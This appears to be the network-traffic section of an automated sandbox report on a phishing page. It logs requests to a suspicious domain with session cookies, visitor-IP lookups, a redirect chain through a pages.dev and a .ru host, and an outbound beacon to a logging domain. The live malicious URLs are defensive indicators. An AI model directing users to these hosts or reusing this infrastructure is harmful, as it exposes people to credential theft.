laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://rfwai.elixir85.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://rfwai.elixir85.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40 HTTP/1.1Host: ysh.logentr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: link.mail.beehiiv.com
          Source: global trafficDNS traffic detected: DNS query: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev
          Source: global trafficDNS traffic detected: DNS query: rfwai.elixir85.com
          Source: global trafficDNS traffic detected: DNS query: zichd.6gniu68.ru
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: github.com
          Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
          Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
          Source: global trafficDNS traffic detected: DNS query: httpbin.org
          Source: global trafficDNS traffic detected: DNS query: ipapi.co
          Source: global trafficDNS traffic detected: DNS query: ysh.logentr.com
          Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 03 Jul 2024 19:06:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21409Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:06:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xHDPp4JIf6W5%2BDk0JsMWxwf7EwYmvp%2FYfbOr7%2ForBSz4LD77PlTvEMshqmRD6ohVVxxfRe8HG5jHbgbHKm%2Binhk4xnpT%2B8ekopSjxsuZl%2F4g0quhwFoJyeMwEn9OQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 1102Server: cloudflareCF-RAY: 89d927a72a525e68-EWR
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:06:55 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: eu1EpEkCcqNgzurIy/LhGA==$64OnncWAQwSUOL04r7Wvmg==Server: cloudflareCF-RAY: 89d927d27c700dc7-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:06:58 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 1iHssQp0AWE2OCmwUtIp1A==$lhC7awhe3i0YGt5cGUyv9A==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 89d927e3ba687d18-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:15 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 7j8SxhPmuMHMx8J+6Gd81Q==$KlvkNg1hiJ+R8XxXLOnDeA==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 89d9284ad85f19c3-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EWmHgFM%2FadqMbdMRJF5E01thRBkArEv%2BWqKGsGQUOQoepA5pgD4pXaaFqd15SCRFoQor2uItdtvKyH7heUKe1a2c8RgqR7VwKqAmyiZam5mOInpxEsbJWEBbwKayuA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d928543ff042c0-EWR
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnZBzm1b6kSL9lqE%2F%2FoZ0pOyhMWKqchZo8tcJ%2BeJq9d2pgvVQseXZwPn2oi3yp%2B2QDObLFK%2BqoTchyOC6vpobHLtid4QzI4pA1acAkxvcDHR22vgftHFCW0qJVYLVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d92881d9c617a9-EWR
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:28 GMTContent-Type: application/json; charset=utf-8Content-Length: 170Connection: closevary: OriginCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkAmjOUGRbvL6MCev0sPu%2FTqpkU3bIJZuCXTCtKqlD5KCE%2F9SkifA4RX1GTYyqLzBZe1eWPtpN5RS5muGDTXphX%2F1bnrJhfKBypszqo8Pa%2BWQRNaZMEIK5oCa9tGcnNUCs4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d9289fda660f55-EWRalt-svc: h3=":443"; ma=86400
          Source: chromecache_114.3.drString found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
          Source: chromecache_128.3.dr, chromecache_102.3.dr, chromecache_118.3.drString found in binary or memory: https://RfWAi.elixir85.com/RfWAi/#X
          Source: chromecache_87.3.drString found in binary or memory: https://cloud.google.com/contact
          Source: chromecache_87.3.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
          Source: chromecache_87.3.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
          Source: chromecache_87.3.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
          Source: chromecache_87.3.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
          Source: chromecache_114.3.drString found in binary or memory: https://github.com/fent)
          Source: chromecache_87.3.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
          Source: chromecache_87.3.drString found in binary or memory: https://recaptcha.net
          Source: chromecache_87.3.drString found in binary or memory: https://support.google.com/recaptcha
          Source: chromecache_87.3.drString found in binary or memory: https://support.google.com/recaptcha#6262736
          Source: chromecache_87.3.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
          Source: chromecache_87.3.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
          Source: chromecache_87.3.drString found in binary or memory: https://www.apache.org/licenses/
          Source: chromecache_112.3.dr, chromecache_87.3.drString found in binary or memory: https://www.google.com/recaptcha/api2/
          Source: chromecache_87.3.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.
          Source: chromecache_112.3.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
